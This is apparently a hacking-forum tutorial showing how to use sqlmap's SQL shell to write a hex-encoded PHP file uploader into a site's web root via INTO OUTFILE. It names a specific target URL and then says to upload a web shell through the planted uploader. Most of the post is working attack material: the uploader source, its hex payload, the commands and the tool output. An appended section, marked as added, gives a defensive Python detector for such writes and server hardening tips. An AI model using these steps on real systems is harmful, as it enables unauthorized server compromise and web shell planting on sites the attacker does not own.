Just a newbie who wants to share so we can all learn together.
Of course you all already know the tool called sqlmap; it's a great tool for SQLi for newbies like me.
This time I want to share some newbie knowledge I picked up by copying from here and there: how to upload a shell using sqlmap.
First, of course, we need a target.
Here's my example target:
Quote:http://dewa-maho.com/tusuk.php?id=5
Then prepare your upload script. As an example, here I'm going to upload this script:
PHP Code:
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>
But first convert the script above to hex before it can be uploaded. The result looks like this:
Open a terminal, then open sqlmap. If you don't have it yet, download it here:
Quote:http://sqlmap.org/
Next:
Quote:python sqlmap.py -u http://dewa-maho.com/tusuk.php?id=5 --sql-shell
Then something like this comes out:
Quote:[15:35:06] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5
[15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell>
Now type SELECT 0x'Hex' INTO OUTFILE "PATH/namaFile";
Don't forget to add '0x' in front of the 'HEX'.
Quote:select 0x3c666f726d20656e63747970653d226d756c7469706172742f666f726d2d646174612220616374696f6e3d2275706c6f61642e70687022206d6574686f643d22504f5354223e3c696e707574206e616d653d2275706c6f6164656466696c652220747970653d2266696c65222f3e3c696e70757420747970653d227375626d6974 222076616c75653d2255706c6f61642046696c65222f3e3c2f666f726d3e0d0a3c3f70687020247461726765745f706174683d626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d293b6966286d6f76655f75706c6f616465645f66696c6528245f46494c45535b2775706c6f6164 656466696c65275d5b27746d705f6e616d65275d2c247461726765745f7061746829297b6563686f20626173656e616d6528245f46494c45535b2775706c6f6164656466696c65275d5b276e616d65275d292e2220686173206265656e2075706c6f61646564223b7d656c73657b6563686f20224572726f7221223b7d3f3e
into "/home/relax/public_html/upload.php";
Wait, and if you're lucky there will be a notice that the upload succeeded; if you're unlucky, well, try again.
If it worked, go ahead and browse to our file from before:
Quote:http://dewa-maho.com/upload.php
Then upload the shell...
Source: http://devilzc0de.org
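For defenders, an added example (not part of the original post): a small Python check that flags the statement shape shown above, a hex literal written out with INTO OUTFILE, in captured SQL statements. The function names, marker list and sample statements are assumptions constructed for illustration; DUMPFILE is included as a generalization.

```python
import re

# Statement shape from the post: SELECT 0x<hex> INTO OUTFILE "<path>".
# DUMPFILE is the sibling MySQL clause, added here as a generalization.
WRITE_RE = re.compile(
    r"\b0x([0-9a-f]{16,})\b.*?\bINTO\s+(?:OUT|DUMP)FILE\s+['\"]([^'\"]+)['\"]",
    re.IGNORECASE | re.DOTALL,
)
# Lower-cased byte markers suggesting the decoded literal is PHP (assumed list).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"move_uploaded_file", b"$_files")
SCRIPT_EXTS = (".php", ".phtml", ".php5")


def inspect_statement(sql):
    """Return a finding dict for a hex-literal file write, else None."""
    m = WRITE_RE.search(sql)
    if not m:
        return None
    hex_text, path = m.group(1), m.group(2)
    if len(hex_text) % 2:
        # MySQL treats an odd-length 0x literal as having a leading zero.
        hex_text = "0" + hex_text
    decoded = bytes.fromhex(hex_text).lower()
    markers = [mk.decode() for mk in SCRIPT_MARKERS if mk in decoded]
    script_ext = path.lower().endswith(SCRIPT_EXTS)
    return {
        "path": path,
        "script_ext": script_ext,
        "markers": markers,
        "severity": "high" if (markers or script_ext) else "review",
    }


def scan(lines):
    """Return (line_number, finding) pairs for every flagged statement."""
    return [(i, f) for i, line in enumerate(lines, 1)
            if (f := inspect_statement(line))]


# Constructed sample statements, as they might appear in a query log.
SAMPLE_LOG = [
    "SELECT name FROM items WHERE id = 5",
    'select 0x%s INTO OUTFILE "/home/relax/public_html/upload.php"'
    % b"<?php echo 'constructed sample'; ?>".hex(),
    "SELECT 0x%s INTO OUTFILE '/tmp/report.csv'" % b"id,name\n1,widget\n".hex(),
]

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE_LOG):
        print(lineno, finding)
```

On the server side, MySQL's secure_file_priv setting and withholding the FILE privilege from the web application's database account block this write path.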